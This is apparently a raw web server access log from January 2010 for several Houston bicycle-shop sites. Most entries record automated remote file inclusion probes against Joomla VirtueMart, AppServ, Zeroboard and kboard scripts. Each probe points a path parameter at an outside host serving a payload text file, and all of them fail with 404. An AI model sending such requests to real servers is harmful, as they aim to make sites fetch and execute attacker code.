65.23.156.168 - - [10/Jan/2010:02:37:14 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:37:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:37:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:37:23 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:38 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:38 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:38 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:40 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:37:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:38:08 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:38:08 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:02:38:08 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:41:19 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:41:19 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:41:19 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:42:36 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:42:36 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:02:42:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:02 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:28 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:28 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:43:28 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:02:47:55 -0800] "GET /logs/scripts.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:47:56 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:47:56 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:49:44 -0800] "GET /logs/scripts.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:49:44 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:49:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:05 -0800] "GET /logs/scripts.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:19 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:19 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:50:19 -0800] "GET /logs/scripts.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:51:02 -0800] "GET /logs/scripts.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:51:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.97.230.5 - - [10/Jan/2010:02:51:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
69.36.2.101 - - [10/Jan/2010:02:51:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:17 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:44 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:57 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:51:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:52:10 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:52:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:02:52:10 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.164 - - [10/Jan/2010:02:53:06 -0800] "GET /logs/access.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.avto-x.ru//photos/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.164 - - [10/Jan/2010:02:53:06 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.avto-x.ru//photos/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.164 - - [10/Jan/2010:02:53:06 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.avto-x.ru//photos/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.164 - - [10/Jan/2010:02:56:01 -0800] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.avto-x.ru//photos/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.39 - - [10/Jan/2010:03:04:32 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); FDM)" "www.svbikes.com"
80.92.181.165 - - [10/Jan/2010:03:08:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
67.195.111.183 - - [10/Jan/2010:03:11:28 -0800] "GET /bullitinboard/viewtopic.php?p=15916 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
218.38.56.83 - - [10/Jan/2010:03:13:41 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:03:13:42 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:03:13:47 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:56 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:56 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:56 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:58 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:58 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:03:16:58 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:03:18:30 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:03:18:30 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:03:18:30 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:03 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:04 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:16 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:22 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Jan/2010:03:21:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:03:37:15 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:03:37:15 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:03:37:16 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.55 - - [10/Jan/2010:03:40:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:03:40:49 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:03:40:58 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:03:40:58 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:42:55 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:42:55 -0800] "GET /appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:42:55 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:46:39 -0800] "GET /index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:46:39 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:46:39 -0800] "GET /logs/access.log%20%20//index.php?option=com_virtuemart&page=shop.pdf_output&showpage=shop.browse&pop=1&output=pdf&product_id=0&category_id=6&Itemid=3&vmcchk=1//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:03:46:55 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:03:46:55 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.230.225.218 - - [10/Jan/2010:03:46:55 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.14.103.146 - - [10/Jan/2010:03:47:44 -0800] "GET /logs/access.log///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tokyozip.com/bbs/DQ_LIBS/include/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:03:49:04 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:03:49:04 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.97.230.5 - - [10/Jan/2010:03:49:04 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:49:36 -0800] "GET /appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:49:36 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
79.170.45.126 - - [10/Jan/2010:03:49:36 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.derivajewels.nl/media/system/js/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:49:50 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:03:49:50 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
